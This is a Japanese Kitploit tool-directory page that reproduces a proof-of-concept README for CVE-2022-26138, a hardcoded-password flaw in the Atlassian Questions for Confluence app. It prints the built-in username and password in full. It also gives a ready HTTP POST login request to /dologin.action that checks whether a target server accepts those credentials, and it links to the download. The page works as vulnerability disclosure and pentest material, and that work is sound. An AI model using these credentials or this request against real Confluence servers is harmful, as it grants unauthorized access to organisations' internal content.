Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-26138 — Atlassian Questions のハードコードされたパスワード (CVE-2022-26138) | Kitploit
ツール/GitHubGitHub/alcaparra/cve-2022-26138
パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubalcaparra/cve-2022-26138

CVE-2022-26138

Atlassian Questions のハードコードされたパスワード (CVE-2022-26138)

リポジトリを見る
31104年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-26138 POC

questions_cve

説明

root@kitploit:~
Atlassian Questions For Confluence アプリ(Confluence Server および Data Center 向け)は、
confluence-users グループに属する Confluence ユーザーアカウントを、
ユーザー名 disabledsystemuser とハードコードされたパスワードで作成します。
このハードコードされたパスワードを知っているリモートの認証されていない攻撃者は、
これを悪用して Confluence にログインし、confluence-users グループのユーザーが
アクセスできるすべてのコンテンツにアクセスできる可能性があります。
このユーザーアカウントは、アプリのバージョン 2.7.34、2.7.35、および 3.0.2 をインストールする際に作成されます。

POC

ハードコードされた認証情報:

  • ユーザー: disabledsystemuser
  • パスワード: disabled1system1user6708

悪用

root@kitploit:~
POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded

os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action

サーバーが /vulnerable.action にリダイレクトした場合、認証情報は有効です。

認証情報はどこから入手したのか?

ハードコードされた認証情報は、影響を受けるプラグインの jar ファイル内に平文で置かれていました。

https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar

参照

  • https://www.cvedetails.com/cve/CVE-2022-26138/
  • https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
  • https://jira.atlassian.com/browse/CONFSERVER-79483
ツールをダウンロード